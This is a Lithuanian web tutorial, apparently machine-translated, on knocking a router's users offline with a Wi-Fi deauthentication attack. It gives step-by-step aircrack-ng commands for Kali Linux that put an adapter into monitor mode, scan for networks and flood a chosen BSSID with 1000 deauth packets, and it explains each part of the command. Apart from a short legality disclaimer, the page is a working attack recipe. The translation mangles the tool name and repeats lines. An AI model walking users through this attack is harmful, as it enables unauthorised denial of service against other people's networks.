Turinys:

Kaip išjungti maršrutizatorių iš interneto (per 10 minučių): 6 žingsniai
Kaip išjungti maršrutizatorių iš interneto (per 10 minučių): 6 žingsniai

Video: Kaip išjungti maršrutizatorių iš interneto (per 10 minučių): 6 žingsniai

Video: Kaip išjungti maršrutizatorių iš interneto (per 10 minučių): 6 žingsniai
Video: Кто-нибудь из вас слышал о полуночной игре? Страшные истории. Мистика. Ужасы 2024, Lapkritis
Anonim
Kaip išjungti maršrutizatorių iš interneto (per mažiau nei 10 minučių)
Kaip išjungti maršrutizatorių iš interneto (per mažiau nei 10 minučių)

Šioje pamokoje aš jums parodysiu, kaip paleisti DOS (denial of service) ataką prieš maršrutizatorių. Tai neleis žmonėms naudotis jūsų užpultu maršrutizatoriumi.

Pradėkime nuo XKCD

Šioje pamokoje bus nurodyta tik tai, kaip paleisti ataką iš „Linux“sistemos, neleiskite, kad tai jus atkalbėtų, paleisti tiesioginę „Kali linux“versiją (ką aš naudojau („aircrack-ng“yra iš anksto įdiegta)) ar kitą „linux distro“(jei naudojate kitą „Linux“distro, turėsite įdiegti „aircrack-ng“), čia yra dvi svetainės, kurios padės jums paleisti „Kali“iš USB įrenginio https://docs.kali.org/downloading/kali-linux -live-usb-installhttps://24itworld.wordpress.com/2016/12/11/how-to-run-live-kali-linux-from-usb-drive/

Tai gali būti neteisėta jūsų gyvenamojoje vietoje, nevykdykite šios atakos jokiame maršrutizatoriuje, kuriam neturite leidimo pulti. Tai neturėtų pakenkti ar sugadinti maršrutizatorių, tačiau gali sugadinti maršrutizatorių, naudokite savo rizika.

Pasilinksminkime.

1 žingsnis: Nesu atsakingas, jei taip atsitiks

Aš nesu atsakingas, jei taip atsitiks
Aš nesu atsakingas, jei taip atsitiks

2 žingsnis: vaizdo įrašas tiems, kurie nori vieno

Image
Image

3 veiksmas: nustatykite „Wifi“adapterį į monitoriaus režimą

Nustatykite „Wifi“adapterį į monitoriaus režimą
Nustatykite „Wifi“adapterį į monitoriaus režimą

iwconfig #suraskite „wifi“adapterio pavadinimą

airmon-ng check kill #įsitikinkite, kad airmon-ng neveikia

„airmon-ng start wlan0“#start airman-ng ir nustatykite „wlan0“į stebėjimo režimą (pakeiskite „wlan0“savo „wifi“adapterio pavadinimu)

4 žingsnis: raskite galimus tinklus

Raskite galimus tinklus
Raskite galimus tinklus

iwconfig #find „wifi“adapterio pavadinimas (mano atveju jis pasikeitė į „wlan0mon“)

„airodump-ng wlan0mon“#Stebėkite galimus tinklus naudodami „wlan0mon“(pakeiskite „wlan0mon“savo „Wi-Fi“adapterio pavadinimu)

5 veiksmas: siųskite nepageidaujamus paketus

Siųskite nepageidaujamus paketus
Siųskite nepageidaujamus paketus
Siųskite nepageidaujamus paketus
Siųskite nepageidaujamus paketus

Čia yra paskutinė komanda

airplay -ng -deauth 1000 -a C0: 56: 27: 4A: 3F: B2 -e "NETGEAR94 2.4GHz_Ext" wlan0mon

Dabar aš paaiškinsiu, ką daro kiekviena šios komandos dalis

airplay-ng-deauth 1000 #ši dalis siunčia 1000 šiukšlių paketų

-a C0: 56: 27: 4A: 3F: B2 -e "NETGEAR94 2.4GHz_Ext" wlan0mon #Siųsti tuos paketus į maršrutizatorių su BSSID "C0: 56: 27: 4A: 3F: B2" ir ESSID "NETGEAR94 2.4GHz_Ext"

Pakeiskite BSSID ir ESSID maršrutizatoriaus, kurį norite užpulti, BSSID ir ESSID.

siųsti tuos paketus per „wifi“adapterį „wlan0mon“(pakeiskite „wlan0mon“savo „wifi“adapterio pavadinimu)

6 žingsnis: sėkmė

Sėkmė!
Sėkmė!

Tai taip paprasta.

Norėdami sustabdyti paketų siuntimą, paspauskite CTL+C arba uždarykite terminalą.

Norėdami pakartoti paskutinę komandą, paspauskite rodyklę aukštyn, tada įveskite.

Čia yra „Aircrack-ng“svetainė

Rekomenduojamas: